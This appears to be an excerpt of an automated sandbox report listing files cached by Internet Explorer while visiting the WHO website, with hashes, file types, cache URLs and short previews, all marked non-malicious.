                                                                                                                                                                    SSDEEP:768:LYm1EGM4mgpbsoNH7+fpMESfuTG6iMdLuWq79K0toZC5c+YP3XQN:L/1EGMfgpbskH7+fpMESfuDiMdLuWq7J
                                                                                                                                                                    MD5:A3D71361D63D379E720F8896C7AA85C0
                                                                                                                                                                    SHA1:FC40960FF7100A9E4BCE4D6E2D094668C6DD7DBC
                                                                                                                                                                    SHA-256:C72545B609C71F570847F39130B7BEBB0549FDB52DA03FB6BB8F974F6C407035
                                                                                                                                                                    SHA-512:2B1C825398513257965ECA85158432855D7CDA270782AB753033671310DDCD8F4A95298AB95746AF17809BBC5C644B8E13E20EBCBB87EA4E06F72F27A933CFD8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://v1.addthisedge.com/live/boost/ra-5803f964fe6c9599/_ate.track.config_resp
                                                                                                                                                                    Preview: _ate.track.config_resp({"pc":"flwi,shin","customMessageTemplates":[],"pro-config":{"_default":{"widgets":{"flwi":{"thankyou":false,"orientation":"horizontal","shape":"square","widgetId":"970d","services":[{"service":"rss","usertype":"user","id":"http://www.who.int/about/licensing/rss/en/index.html"},{"service":"youtube","usertype":"user","id":"whosoutheastasia"},{"service":"twitter","usertype":"user","id":"WHOSEARO"},{"service":"facebook","usertype":"user","id":"WorldHealthOrganizationNepal"},{"service":"instagram","id":"who.searo","usertype":"user"},{"service":"linkedin","id":"world-health-organization","usertype":"company"}],"title":"","__hideOnHomepage":false,"borderRadius":"46%","size":"large","elements":".addthis_inline_follow_toolbox_tsza_970d","creationTimestamp":1588925397087,"iconColor":"#FFFFFF","hideDevice":"none","id":"flwi","postFollowTitle":"Thanks for following!","toolName":"Follow button Nepal English"},"shin":{"hideEmailSharingConfirmation":false,"buttonColor":"#FFFFFF
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\210323_BLS21079_WHO_WHD_EN_web-banner_A.1[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 131x44, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2414
                                                                                                                                                                    Entropy (8bit):7.787323077249669
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:7vymuERAeQjEWPITymowwidAUP2KNbqhqYGqUZLss2NrXTV6:EEMEWwy57I/FNbZEUZL4No
                                                                                                                                                                    MD5:198FD11DE3180F22F1F5102674C8EA7F
                                                                                                                                                                    SHA1:7C9CAF6BF835002FFF03382FE1A32312ACD646F6
                                                                                                                                                                    SHA-256:063C54795DE354A6F339EA91CA431193AE772CA3175CE48633D9BF50091CD988
                                                                                                                                                                    SHA-512:CAB6BE7D84EFDFB06E9177C72CE8BC7A8EB94B172A8214A4A7CAAC5779CB831255E5972AFEFEE4B3C5FF02E221FFD86CB1AED377B54B35A09106ECE4BDA8CE22
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/world-health-day/210323_bls21079_who_whd_en_web-banner_a.1.tmb-131v.jpg?sfvrsn=f92ac7aa_2
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\3-wha71-dg-tedros-opening-speech[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 549x366, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):15077
                                                                                                                                                                    Entropy (8bit):7.9603925935569935
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:CQbHe1HR9+4CmaGno7SNMu1sKKUEgId3ayKRuGZCrS53GDCRSF6PuKKVk:VHEy4vzcduW2EBd3krsrSxGaSgPn
                                                                                                                                                                    MD5:9009C44BC8E9FAEE76F70B7B101249DE
                                                                                                                                                                    SHA1:81A54CE9EE2498C4D9653BA8310B0FC4AB29EB04
                                                                                                                                                                    SHA-256:EE21101FF1A923124E465B4BFF58692B5C43BB6DD97DB386C42DB6B5495D15B2
                                                                                                                                                                    SHA-512:40735D7E2AE8DB23CCE5139415CA6774B0019FD0BDBE8FDB952F3C0D8CFE7E392F07BB89FC16F7096FCD184E1FD2F69ED148EBE84BB1635819EA3563282DAE51
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/world-health-assembly/wha71/day-1/3-wha71-dg-tedros-opening-speech.tmb-549v.jpg?Culture=en&sfvrsn=c6b9209c_12
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\992x312-pag-coronavirus-2[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 479x303, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):31753
                                                                                                                                                                    Entropy (8bit):7.971456747037656
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:dYQXyaadLzkm5bLaJWCWhnj4/5ZcswGasho3:uuRgVLQWhj4/5ZiOho3
                                                                                                                                                                    MD5:3A7E45BE0E2DCFAC5CF5B60CFAE8621C
                                                                                                                                                                    SHA1:62BBB64EF8A150F6E78579855A42D650A0FBE0D5
                                                                                                                                                                    SHA-256:3C3FBE6D5EC98B49A575AC2E712A4F7F4252463525DFDD4B84EFB1C9B86EB678
                                                                                                                                                                    SHA-512:93F2AB40F969860E86E2BB4C73F3521AC1797D94D5465765871A4CFCD0A0852924E2D1B4064A9EA4324ECA97AF303FCF7F6760F2C27005BC8206F68FE11D4717
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/departments/child-health/992x312-pag-coronavirus-2.tmb-479v.jpg?Culture=en&sfvrsn=4da24492_7
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\A-year-in-pictures--A-shared-commitment-to-change-the-course-of-the-pandemic_WHO-Bangladesh--TA-3[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x365, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):46216
                                                                                                                                                                    Entropy (8bit):7.985513256270707
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:5Ivujv8jfYYv+QCcFNTjHv/dbaV4r96saj8VV7vd+Yd7oZ2yKg/imTS62PflDso8:5iujv8jfFv+QptP/dR6saj+V7vdzFMck
                                                                                                                                                                    MD5:70C0C39E1C30AC0717DCC64110E5C447
                                                                                                                                                                    SHA1:CB61083CB628C3CD598CA85A9097C7C3AD4DCB46
                                                                                                                                                                    SHA-256:4DB6FE462365A1E502CA6330F25BD477299B962DCAF6DEAA57351B5BA2F3716B
                                                                                                                                                                    SHA-512:EB917EBF196491FC8BF9A56626FCB6D138AF28CD1E19DA85696630C08FBE3A9281BD27592354F9A30E32B183970FDFCB38CBD542CABDDA6BAFADAD63A4ECA663
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/bangladesh/cxb/a-year-in-pictures--a-shared-commitment-to-change-the-course-of-the-pandemic_who-bangladesh--ta-3.tmb-549v.jpg?sfvrsn=dbf025dd_1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\A-year-in-pictures--A-shared-commitment-to-change-the-course-of-the-pandemic_WHO-Bangladesh--TA-3[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x319, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):36696
                                                                                                                                                                    Entropy (8bit):7.981838750647916
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:zqH7Rp2TmFyVZHU3RwoB7P7GkZJhc2BEyzR1s7zexPOwEI5y5DRPBFI6Nba:2H7RUTmFgHU3DB7PikZg2GExPLEsy5tY
                                                                                                                                                                    MD5:444D84B6DC67BDC55E425A7E8B173E5E
                                                                                                                                                                    SHA1:F088E60BD16CD7D6D242F016ABE902A5A3522323
                                                                                                                                                                    SHA-256:40975B9ED5BCB47F1C774A3CC0A3B3EEF87D630AFC77408053E88F24D9C4859A
                                                                                                                                                                    SHA-512:9EC8E9D8149659E3B69ECB20BF2BB3EB03E599B3F43CB58738EBF464748FC14AC1E8B8A3379D872DBD04DE8D3CB85FE41D23108DC793608D355544939FFB7290
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/bangladesh/cxb/a-year-in-pictures--a-shared-commitment-to-change-the-course-of-the-pandemic_who-bangladesh--ta-3.tmb-479v.jpg?sfvrsn=dbf025dd_1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ScriptResource[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):253609
                                                                                                                                                                    Entropy (8bit):5.142800237248841
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:RkvBNnLO1wG0qOOO8D5BnAcKcv1/i/fXMS6PuQr1Q7SV7opS:8LODl6c/KuS6Px
                                                                                                                                                                    MD5:029E5E7227E947922B06EC41A1742BA1
                                                                                                                                                                    SHA1:C2FC0DA1AD13727E1CE25193ED6BF67BF72F610A
                                                                                                                                                                    SHA-256:FD2A752492B64050C772C50F5539A28ED106D2433945C04ABB57E3FAB1A83186
                                                                                                                                                                    SHA-512:9DF2BCA13274B8B4B2C7867FD0AB4F67587475BCB18610F408DAB8C19E7F0A7872E4D0322B23DA3265948B58C2083F289BF86EBF3B92AA89803A5982F68E4906
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ScriptResource.axd?d=VKaJmfFWDpQxp1_HxsR1qHE1D0LSpd2pufRu26_SWXJKx_WpH0HNrJsUk7mfatpo7E2ZG3zAPSalK7AO6i8q6frr9qeTupRsYs3Dn67sjSLmCFESPd3iJ_vINUWGfdbYkrtzOmP0KIfi4N8gdSZOX9KZWpxIlEcYI4xzS0Y-bAu18kf2x98txvCw052kniXxWNIL9Q2&t=ffffffffcd3c2666
                                                                                                                                                                    Preview: /*! jQuery UI - v1.12.1 - 2018-02-18.* http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/draggable.js, widgets/droppable.js, widgets/resizable.js, widgets/selectable.js, widgets/sortable.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/selectmenu.js, widgets/slider.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\YHCW2021_webbanner[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x255, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):38274
                                                                                                                                                                    Entropy (8bit):7.984892584526061
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:vCwf22j5Vnm+QJ5M28x2cCKK4E2yBEifL5KsNAnuJyuk39XpZBgR6:KI221g+M5MrxcKK4EXEeLNwuBkNXdl
                                                                                                                                                                    MD5:345510F79879FD3E4DAA7090FFF8A302
                                                                                                                                                                    SHA1:68C5C91EC5928A34B609B02E02C69C3B1C03278C
                                                                                                                                                                    SHA-256:DF291640549F8FF46724D9BE1A077048809E9061B984560CE82154ACE03EF0FD
                                                                                                                                                                    SHA-512:5B23839FDBE7FB9D27761A4953F23312918D17255BF9188B5A42319C009086FF45E67379BD706A062235595F5DB9955AD3B509899D1E4F5EB080F377FEEF352B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/annual-theme/year-of-health-and-care-workers-2021/yhcw2021_webbanner.tmb-549v.jpg?Culture=en&sfvrsn=8bc1f524_3
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\aRB5vtMgII7DALCmCUZFfhabFCI8RNJQqSbe_9t5ggE[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):36350
                                                                                                                                                                    Entropy (8bit):5.674957632254336
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:SfZJ/WEMMnbd0TrOsUy+/cxjoGEq2rUX/sL:SP/WRr0ygGEq16
                                                                                                                                                                    MD5:0652417DC509F9DF094ED9040894BD35
                                                                                                                                                                    SHA1:FE49BE86848AD902EE441440783A2875E9EE0A51
                                                                                                                                                                    SHA-256:691079BED320208EC300B0A60946457E169B14223C44D250A926DEFFDB798201
                                                                                                                                                                    SHA-512:B5FB4825C1AC0BC6AB1EA565263E63AB1ADFAE97FFBCE2B8BC291C735FF0AB71467D668A99CF21923C7E3A0DB29117462BD615EB7EAE890E438DB98C1C4BE752
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.google.com/js/th/aRB5vtMgII7DALCmCUZFfhabFCI8RNJQqSbe_9t5ggE.js
                                                                                                                                                                    Preview: (function(){var v=function(a,C,F,Z,M){if(!(Z=(M=x.trustedTypes,a),M)||!M.createPolicy)return Z;try{Z=M.createPolicy(F,{createHTML:K,createScript:K,createScriptURL:K})}catch(Y){if(x.console)x.console[C](Y.message)}return Z},K=function(a){return a},x=this||self;(0,eval)(function(a,C){return(C=v(null,"error","ad"))&&1===a.eval(C.createScript("1"))?function(F){return C.createScript(F)}:function(F){return""+F}}(x)(Array(7824*Math.random()|0).join("\n")+'(function(){var S=function(C,a,F,Z,M,K,x,Y,v,p,H,u,w,b,W,d,P,y){if(16==(C>>((C-3)%155||(Z.U=((Z.U?Z.U+"~":"E:")+F.message+":"+F.stack).slice(0,a)),1)&87)){for(F=[];a--;)F.push(255*Math.random()|0);y=F}if(25==(9==(((16==((C^954)&123)&&(a(function(T){T(F)}),y=[function(){return F}]),C)^523)&111)&&F.uI&&m(0,F.uI,a,Z,void 0),C>>1&63)){for(Z=[],K=0;K<a.length;K+=3)P=a[K],F=(W=K+2<a.length)?a[K+2]:0,M=P>>2,d=(Y=K+1<a.length)?a[K+1]:0,x=(b=-~(P|3)-(P^3)+(~P&3)+(P|-4)<<4,v=d>>4,(b&v)+~(b&v)-~(b|v)),p=(H=(d|0)- -1+(~d|15)<<2,w=F>>6,-~(H&w)-(H&~w)+2*(
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\accordion-list.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3689
                                                                                                                                                                    Entropy (8bit):4.880253848544661
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:pgIG7qMzPC8D88SWoX45dC7HEyXY4yZA1LyUskdg3mfkEWyuIfNZgiO/hOgp7xHe:WT6hoWdyKTT51x+/p7xHyRf
                                                                                                                                                                    MD5:D0C48CAE086C10FB25D9351BA3D914E4
                                                                                                                                                                    SHA1:EEF9F7590016F6B9A7E2910EFC1D578915FA9D2D
                                                                                                                                                                    SHA-256:5D166A69B51D2788994DD13C3436E5B6277BD73B6292438BCE448CEC2EEF9DA3
                                                                                                                                                                    SHA-512:759FBEFC04E4957270E23D50C00D8502977EFF92BF9F813AF1403DA36168578709662F9639F6F214E1A8150E7004BFC4DD65795CDA98786C9E97896B82026D15
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/accordion-list.min.js
                                                                                                                                                                    Preview: "use strict";!function(window){var accordion=null,activePanelClass="is-active",accordionPanels=null,currentPanel=null,childrenLinks=null;function _activateSelectedPanel(evt){evt.preventDefault();var selectedPanel=_findAncestor(evt.currentTarget,"sf-accordion__panel");if(currentPanel===selectedPanel&&currentPanel.classList.contains(activePanelClass))return currentPanel=selectedPanel,void _removeCurrentPanel();_removeCurrentPanel(),_displaySelectedPanel(selectedPanel)}function _displaySelectedPanel(selectedPanel){selectedPanel.classList.add(activePanelClass);var currentContent=selectedPanel.querySelector(".sf-accordion__content");currentContent.style.display="block",currentContent.style.height=currentContent.offsetHeight,currentContent.style.opacity=1,currentPanel=selectedPanel}function _removeCurrentPanel(){if(void 0===currentPanel)return this;var currentContent=currentPanel.querySelector(".sf-accordion__content");currentContent.style.opacity=0,currentContent.style.display="none",curren
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ad_status[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                    Entropy (8bit):4.142295219190901
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lZOwFQvn:lQw6n
                                                                                                                                                                    MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                                                                                                                                                    SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                                                                                                                                                    SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                                                                                                                                                    SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://static.doubleclick.net/instream/ad_status.js
                                                                                                                                                                    Preview: window.google_ad_status = 1;.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\addthis_widget[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):361292
                                                                                                                                                                    Entropy (8bit):5.507224233490729
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:joM/HvwM4X4UZ8pVTXPZIcVykc2VeakzRDU:MM/AXMDP9ykc2VeakdU
                                                                                                                                                                    MD5:61DCFA8958E6A7CC3F23B3B4758EE178
                                                                                                                                                                    SHA1:C4313CF29A2C056422AB798A2D088743C0972E97
                                                                                                                                                                    SHA-256:ACD2F7AD78EDEEBAD4B6B0FDD17FF57D81C3726C60FD5435EE8C5A0115D29403
                                                                                                                                                                    SHA-512:9FF8F714925A8CB650F206747164FBD575B964F530C4241F1B3A1F6678CAB245B5D34D6C6CFA761642026E3B7700CDA36AC0AC4143FB27F7865E3C9C5BB96D43
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/js/300/addthis_widget.js
                                                                                                                                                                    Preview: /*!.AddThis - v8.28.7 - 20201026;.Copyright (c) 1998, 2020, Oracle and/or its affiliates..*/../*!...invariant : 2.1.0.BSD.Copyright (c).All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...* Neither the name of invariant nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS".AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF ME
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\fa-regular-400[1].eot
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Embedded OpenType (EOT), Font Awesome 5 Free family
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):30788
                                                                                                                                                                    Entropy (8bit):6.189302031690045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:eGvrcbhO5Q1FITSECKMSW3Ncszv6/KUgjIe66/MeM6eNwyRRiylqDF4X6B3UsmLi:eGvrcbqQ1WTSECKMSW3NcszvcKUMIe6C
                                                                                                                                                                    MD5:93CD9A877C794FE87F8CE84F189D304F
                                                                                                                                                                    SHA1:E3A0DA640F592DB27F39D267B591F61CCE80B840
                                                                                                                                                                    SHA-256:6C470766C2C3E11FAFFEAD7DDE6F0D9F4BD4E7EC1784332EA852CD08B7D757D0
                                                                                                                                                                    SHA-512:FF365F0FB203BE21A55F6A9BB848682BFDC5EE2E44F5BE32EC70639F1CDEAA5CC73A710917C5B77CE435BCA6D0A211AE662C93139F3360D639701E9F0AC4AACF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://use.fontawesome.com/releases/v5.0.10/webfonts/fa-regular-400.eot?
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\favicon[1].ico
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1150
                                                                                                                                                                    Entropy (8bit):5.44221041888323
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:BvtoOaPQSV1WvuhHg9XGdqiZNPGFwUmSydj60pF3KVuz:BFDNuhHgEwRx5yFPpz
                                                                                                                                                                    MD5:031D7A3D3906B292D27013B753A2E47F
                                                                                                                                                                    SHA1:447B9ED0C25473CE78580CFFB511F98B94E71C49
                                                                                                                                                                    SHA-256:621A54FD47363C36B42E3791B1E5B36049B66C3693A7FF0C9CE20024F5620ADD
                                                                                                                                                                    SHA-512:89B719C4DCD42182612B2DF0DF5D947322CC5CFDD734DE679CFC0A678A4218D8FCDCBAB185FE0E3526A376C8ED1147918300D706B3970A140C6C932C3FE1B284
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/favicon.ico
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\h-logo-blue[1].svg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):15880
                                                                                                                                                                    Entropy (8bit):4.140082608950543
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:KtSpsQ6qvH4odxQGy7bE6UYCRhmYSboCf:9zUbE6UY+EdUCf
                                                                                                                                                                    MD5:CB1B6DEA42CF42F566722BD93EF18186
                                                                                                                                                                    SHA1:2531FA2689AA23B2CDC3E154E9722E0C5E73D76F
                                                                                                                                                                    SHA-256:1F756ED7DAC7C90DA4F98582535E47684DC75ADDB21AF9653ABF9155EA3B1713
                                                                                                                                                                    SHA-512:B68448926C4D20D057CBD90B85725A49A3A999608DA6837E9F464D6018C76F9495FB3F6F5D3E5801C9A1D8C0D590173BFB0DF86E7149AEAD70208237AA3A9CE5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svg
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\layers.fa6cd1947ce26e890d3d[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):269557
                                                                                                                                                                    Entropy (8bit):5.429111467374434
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:ap1Lf7mGJQoq/cpp6+PVfVDRGpTr5ojO3:abj7mGJQCp6+PVfA5oK
                                                                                                                                                                    MD5:476D935D6723F9ABEA1160C155FFB725
                                                                                                                                                                    SHA1:477FF2F072C62493BE703060B3DA7C7A5492F840
                                                                                                                                                                    SHA-256:6121CA306AD1045453D52517B8F436EB5A68055C82AEFA46A9A77DE36996A3DF
                                                                                                                                                                    SHA-512:C8B11FC445236C60E3D75BDC4BE71F3E6CA46E931740795A1ADDCD86B0F53F721192842017BD414E383A74F5544C23DBADD796E2074E0FC57CCFC7F06B84CD09
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/layers.fa6cd1947ce26e890d3d.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\main.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):345500
                                                                                                                                                                    Entropy (8bit):5.349263090498914
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:eM2I5vDPD/zo/MYOQ4xofA8ki72ZeEA/j:eOvDPD/zo/MYOQ4xy72Zy
                                                                                                                                                                    MD5:CE2173110E4830F15FAE89CB57718CFC
                                                                                                                                                                    SHA1:C68E2CF128BA2144B7B78B04BFB2EF12756FF810
                                                                                                                                                                    SHA-256:2F83A9E35BC415D3848E1485B953ED36976F02B47627D2418B286103B526D5C2
                                                                                                                                                                    SHA-512:4034594FCC1ACFDF640D00DB81E32BFF642145CAEB3D91E8122DD07CC2F7F35CF198AC54383E8139FAA8FDE829E49AFE10CACA669D1FF8B31B332DA6EDD5B474
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/main.min.css?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\moatframe[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1705
                                                                                                                                                                    Entropy (8bit):5.531860359366191
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:V+SiCucuqiTlBgaavwmpbDDRlsSEpvJEBrcm:8FJqQMZvJcSEty
                                                                                                                                                                    MD5:DD1A19CB8D13E4571D2B293C0A0D2CCF
                                                                                                                                                                    SHA1:18070DD5C894930A8AEF7117BF8D49BD4922A723
                                                                                                                                                                    SHA-256:05090F9390F5BC0CD23FE5F432037CC92D7CBCE1CED9BFE8FAF3D1C9ABAE85CD
                                                                                                                                                                    SHA-512:9103CA5B7E85BA307A366134146D9505A6CA8722878629678F680B790108AB9DE31ACEDCCA36AC79EC989194BEA55C2C08CD14A08CD0BC67841D16C115D4FCB2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://z.moatads.com/addthismoatframe568911941483/moatframe.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\origin.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):218081
                                                                                                                                                                    Entropy (8bit):5.096500957430576
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:pcM6NJqrquf/0H0xQCFje6tAsmUtxY+fjaN7Zys6GYGARruilnyMRyjx/M+oVpZz:p1suf/ChLY
                                                                                                                                                                    MD5:C2971D3D27BBCADAD28C58D113638037
